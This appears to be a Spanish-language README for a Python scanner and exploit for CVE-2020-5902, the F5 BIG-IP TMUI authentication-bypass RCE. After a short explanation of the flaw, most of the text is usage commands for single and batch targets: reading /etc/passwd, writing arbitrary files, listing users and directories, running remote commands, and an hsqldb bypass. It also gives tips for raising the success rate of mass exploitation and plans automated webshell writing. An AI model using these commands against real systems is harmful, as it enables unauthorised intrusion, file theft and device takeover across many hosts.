
Herramienta de comprobación automática de RCE en F5 BIG-IP CVE-2020-5902
El 20200706, se filtró en línea una vulnerabilidad RCE en la interfaz de administración de tráfico (TMUI) de F5 BIG-IP.
El componente TMUI (Interfaz de usuario de gestión de tráfico) de F5 BIG-IP tiene una vulnerabilidad de omisión de autenticación. Esta vulnerabilidad se debe a una diferencia entre la URL analizada por Tomcat y request.getPathInfo(), lo que permite omitir la verificación de permisos, acceder sin autenticación a todas las funciones del módulo TMUI, y posteriormente leer/escribir archivos arbitrarios, ejecutar comandos, etc.
Ver detalles en Reproducción y puntos de atención de la vulnerabilidad RCE en F5 BIG-IP TMUI (CVE-2020-5902)
Esta herramienta admite detección de IP única, detección por lotes, lectura/escritura de archivos, listado de usuarios autenticados, listado de directorios, ejecución remota de comandos y detección de omisión de autenticación hsqldb.
pip install requests
python f5-bigip-rce-cve-2020-5902.py -h

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

En las IPs por lotes, se recomienda agregar http:// o https:// al inicio. Si no se especifica protocolo, se agregará http:// por defecto.
Si las condiciones lo permiten, se sugiere agregar el parámetro --still-exploit. Esto permite ejecutar RCE incluso si falla el listado de usuarios autenticados, aumentando la tasa de éxito.
Enviar múltiples solicitudes para aumentar la tasa de éxito en lotes, teniendo en cuenta el equilibrio con la eficiencia.
Integrar la explotación de deserialización a través de la interfaz hsqldb.
Agregar escritura automatizada de webshell.
issus
lsablog
gmail:[email protected]
qq:[email protected]